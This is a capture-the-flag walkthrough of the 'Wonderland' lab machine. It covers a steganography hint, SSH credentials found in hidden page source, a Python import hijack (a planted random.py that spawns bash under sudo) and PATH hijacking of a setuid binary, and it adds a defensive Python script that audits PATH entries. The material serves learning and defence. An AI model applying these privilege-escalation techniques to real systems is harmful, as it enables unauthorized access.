PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 8e:ee:fb:96:ce:ad:70:dd:05:a9:3b:0d:b0:71:b8:63 (RSA)
| 256 7a:92:79:44:16:4f:20:43:50:a9:a8:47:e2:c2:be:84 (ECDSA)
|_ 256 00:0b:80:44:e6:3d:4b:69:47:92:2c:55:14:7e:2a:c9 (ED25519)
80/tcp open http Golang net/http server (Go-IPFS json-rpc or InfluxDB API)
|_http-title: Follow the white rabbit.
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Let's manually check the website for any hints. /img/white_rabbit_1.jpg is referenced in the page source; as it's a CTF, let's not leave any assumption unchecked :)
$ wget http://10.10.125.113/img/white_rabbit_1.jpg
$ steghide info white_rabbit_1.jpg
"white_rabbit_1.jpg":
format: jpeg
capacity: 99.2 KB
Try to get information about embedded data ? (y/n) y
Enter passphrase:
embedded file "hint.txt":
size: 22.0 Byte
encrypted: rijndael-128, cbc
compressed: yes
$ steghide extract -sf white_rabbit_1.jpg
Enter passphrase:
wrote extracted data to "hint.txt".
$ cat hint.txt
follow the r a b b i t
Dirsearch found a /r directory, which is the first letter of “rabbit”. Let’s follow the r a b b i t
$ curl -s http://10.10.125.113/r/a/b/b/i/t/
<!DOCTYPE html>
<head>
<title>Enter wonderland</title>
<link rel="stylesheet" type="text/css" href="/main.css">
</head>
<body>
<h1>Open the door and enter wonderland</h1>
<p>"Oh, you’re sure to do that," said the Cat, "if you only walk long enough."</p>
<p>Alice felt that this could not be denied, so she tried another question. "What sort of people live about here?"
</p>
<p>"In that direction,"" the Cat said, waving its right paw round, "lives a Hatter: and in that direction," waving
the other paw, "lives a March Hare. Visit either you like: they’re both mad."</p>
<p style="display: none;">alice:HowDothTheLittleCrocodileImproveHisShiningTail</p>
<img src="/img/alice_door.png" style="height: 50rem;">
</body>$
There are credentials in a hidden paragraph of the page source (alice:HowDothTheLittleCrocodileImproveHisShiningTail), and they work for the SSH service.
Lateral Movement (alice -> rabbit)
alice@wonderland:~$ pwd
/home/alice
alice@wonderland:~$ ls -la
total 40
drwxr-xr-x 5 alice alice 4096 May 25 17:52 .
drwxr-xr-x 6 root root 4096 May 25 17:52 ..
lrwxrwxrwx 1 root root 9 May 25 17:52 .bash_history -> /dev/null
-rw-r--r-- 1 alice alice 220 May 25 02:36 .bash_logout
-rw-r--r-- 1 alice alice 3771 May 25 02:36 .bashrc
drwx------ 2 alice alice 4096 May 25 16:37 .cache
drwx------ 3 alice alice 4096 May 25 16:37 .gnupg
drwxrwxr-x 3 alice alice 4096 May 25 02:52 .local
-rw-r--r-- 1 alice alice 807 May 25 02:36 .profile
-rw------- 1 root root 66 May 25 17:08 root.txt
-rw-r--r-- 1 root root 3577 May 25 02:43 walrus_and_the_carpenter.py
There's a root.txt in alice's home directory, which is weird, but then the hint said earlier that everything is upside down! Let's list our sudo permissions :)
alice@wonderland:~$ sudo -l
[sudo] password for alice:
Matching Defaults entries for alice on wonderland:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User alice may run the following commands on wonderland:
(rabbit) /usr/bin/python3.6 /home/alice/walrus_and_the_carpenter.py
And there's another weird file, walrus_and_the_carpenter.py. Viewing it shows a poem, and when executed the script prints random lines of that poem using the random module. The sudo -l output shows that alice may run this script with python3.6 as the rabbit user.
alice@wonderland:~$ python3 walrus_and_the_carpenter.py
The line was: Walked on a mile or so,
The line was: The Carpenter said nothing but
The line was: "That they could get it clear?"
The line was: Were walking close at hand;
The line was: We can begin to feed."
The line was: Those of the largest size.
The line was: They said, "it would be grand!"
The line was: All eager for the treat:
The line was: And why the sea is boiling hot —
The line was: "It seems a shame," the Walrus said,
The only possibility seems to be hijacking the `import random` statement in the script so that it imports our own module instead of the standard library one.
Let's plant our own random.py next to the script:
alice@wonderland:~$ cd /home/alice/
alice@wonderland:~$ cat > random.py << EOF
import os
os.system("/bin/bash")
EOF
Running the script through sudo as the rabbit user now pops a bash shell as rabbit :)
As we are the rabbit user now, let's list its home directory:
rabbit@wonderland:/home/rabbit$ ll
total 40
drwxr-x--- 2 rabbit rabbit 4096 May 25 17:58 ./
drwxr-xr-x 6 root root 4096 May 25 17:52 ../
lrwxrwxrwx 1 root root 9 May 25 17:53 .bash_history -> /dev/null
-rw-r--r-- 1 rabbit rabbit 220 May 25 03:01 .bash_logout
-rw-r--r-- 1 rabbit rabbit 3771 May 25 03:01 .bashrc
-rw-r--r-- 1 rabbit rabbit 807 May 25 03:01 .profile
-rwsr-sr-x 1 root root 16816 May 25 17:58 teaParty*
rabbit@wonderland:/home/rabbit$ file teaParty
teaParty: setuid, setgid ELF 64-bit LSB shared object, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, for GNU/Linux 3.2.0, BuildID[sha1]=75a832557e341d3f65157c22fafd6d6ed7413474, not stripped
rabbit@wonderland:/home/rabbit$ ./teaParty
Welcome to the tea party!
The Mad Hatter will be here soon.
Probably by Thu, 11 Jun 2020 13:29:28 +0000
Ask very nicely, and I will give you some tea while you wait for him
tea
Segmentation fault (core dumped)
teaParty is a setuid ELF binary. Running strings on it shows that the only thing it does is run the date command to get the current time and then print the time an hour later. We need to exploit this!
We create our own version of the date command that invokes a shell, then prepend its directory to PATH so that the binary executes our date instead of the real one.
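The root cause here is a privileged program resolving `date` by bare name through a PATH it inherited from the caller; sudo protects itself against exactly this with the secure_path shown in the sudo -l output above, but a setuid binary gets no such reset, so the fix is to call /bin/date by absolute path (or not shell out at all) and to reset PATH before any exec. The following is an added example, not from the walkthrough or the room: it mimics execvp-style lookup to show which binary wins, audits each PATH entry for places an unprivileged user could drop a file, and builds the hijacked PATH scenario in a world-writable temp directory of its own. SAFE_PATH is copied from the sudo -l output; the fake date it creates only echoes a string.

```python
"""Audit the PATH a privileged program would use when it runs a command by bare
name (as teaParty does with `date`), and show how lookup order decides which
binary runs. Added example; the hijacked directory is a temp dir it creates."""
import os
import stat
import tempfile
from pathlib import Path

# The fixed PATH sudo uses on the box (secure_path from the sudo -l output);
# a setuid binary gets no such protection and inherits the caller's PATH.
SAFE_PATH = "/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin"


def resolve_command(name, path_value):
    """execvp-style lookup: walk PATH in order and return the first executable hit."""
    for entry in path_value.split(os.pathsep):
        candidate = Path(entry or ".") / name
        if candidate.is_file() and os.access(candidate, os.X_OK):
            return str(candidate)
    return None


def risky_path_entries(path_value, uid):
    """(entry, reason) for every PATH entry where an unprivileged `uid` could place a binary."""
    findings = []
    for entry in path_value.split(os.pathsep):
        if entry in ("", "."):
            findings.append((entry or "<empty>", "resolves to the current directory"))
            continue
        if not os.path.isabs(entry):
            findings.append((entry, "relative path"))
            continue
        try:
            st = os.stat(entry)
        except FileNotFoundError:
            findings.append((entry, "missing directory; check whether its parent is writable"))
            continue
        if uid != 0 and st.st_uid == uid:
            findings.append((entry, "owned by the unprivileged user"))
        elif st.st_mode & stat.S_IWOTH and not st.st_mode & stat.S_ISVTX:
            findings.append((entry, "world-writable without sticky bit"))
        elif st.st_mode & stat.S_IWGRP and st.st_gid != 0:
            findings.append((entry, "writable by a non-root group"))
    return findings


def demo():
    """Constructed scenario: a world-writable directory holding a fake `date`,
    prepended to PATH the way the walkthrough does. The fake only echoes a string."""
    tmp = tempfile.mkdtemp()
    os.chmod(tmp, 0o777)
    fake = Path(tmp) / "date"
    fake.write_text("#!/bin/sh\necho 'not the real date'\n")
    fake.chmod(0o755)
    hijacked = tmp + os.pathsep + SAFE_PATH
    return {
        "tmp": tmp,
        "fake": str(fake),
        "hijacked_resolves_to": resolve_command("date", hijacked),   # the fake wins
        "flagged": [e for e, _ in risky_path_entries(hijacked, os.getuid())],
        "safe_path_hits_tmp": (resolve_command("date", SAFE_PATH) or "").startswith(tmp),
    }


if __name__ == "__main__":
    result = demo()
    print("date resolves to:", result["hijacked_resolves_to"])
    print("risky PATH entries:", result["flagged"])
    print("with secure_path, date comes from the temp dir:", result["safe_path_hits_tmp"])
```

The same `risky_path_entries` check run against the PATH of a logged-in user, with that user's uid, tells you immediately whether a setuid binary on the host that shells out by bare name is exposed; the mitigation is on the binary's side, not the user's.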
Privilege Escalation to R00T
Make sure you run all tests (linpeas.sh -a). We get something interesting about Perl :)